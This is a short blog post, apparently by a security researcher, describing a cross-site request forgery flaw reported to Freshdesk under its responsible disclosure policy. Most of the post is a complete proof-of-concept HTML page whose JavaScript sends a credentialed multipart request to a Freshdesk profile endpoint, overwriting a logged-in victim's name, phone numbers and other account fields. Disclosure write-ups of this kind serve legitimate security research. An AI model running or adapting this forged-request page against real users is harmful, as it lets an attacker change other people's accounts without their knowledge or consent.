Advertisements

Rewarded by Freshdesk

I was able to find out few web application related security issues in the Freshdesk website. They had a responsible disclosure policy, so I was able to report them. http://freshdesk.com/security

View post on imgur.com

The application did not have proper CSRF tokens used. Any arbitrary user could change account information of other users.

&lt;html&gt;

  &lt;body&gt;
    &lt;script&gt;
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open(&quot;POST&quot;, &quot;http://exploit.freshdesk.com/support/profile&quot;, true);
        xhr.setRequestHeader(&quot;Accept&quot;, &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;);
        xhr.setRequestHeader(&quot;Accept-Language&quot;, &quot;en-US,en;q=0.5&quot;);
        xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;multipart/form-data; boundary=---------------------------273522544628602&quot;);
        xhr.withCredentials = true;
        var body = &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;_method\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;put\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[avatar_attributes][content]\&quot;; filename=\&quot;\&quot;\r\n&quot; + 
          &quot;Content-Type: application/octet-stream\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[name]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;haxor\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[job_title]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;haxor\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[phone]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;12345678904\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[mobile]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;7894561233\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[twitter_id]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;@exfdsfdsf\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[time_zone]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;sesdsds\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;user[language]\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;en\r\n&quot; + 
          &quot;-----------------------------273522544628602\r\n&quot; + 
          &quot;Content-Disposition: form-data; name=\&quot;commit\&quot;\r\n&quot; + 
          &quot;\r\n&quot; + 
          &quot;Save Changes\r\n&quot; + 
          &quot;-----------------------------273522544628602--\r\n&quot;;
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i &lt; aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    &lt;/script&gt;
    &lt;form action=&quot;#&quot;&gt;
      &lt;input type=&quot;button&quot; value=&quot;Submit request&quot; onclick=&quot;submitRequest();&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

Advertisements

Related

Leave a Reply Cancel reply

%d bloggers like this: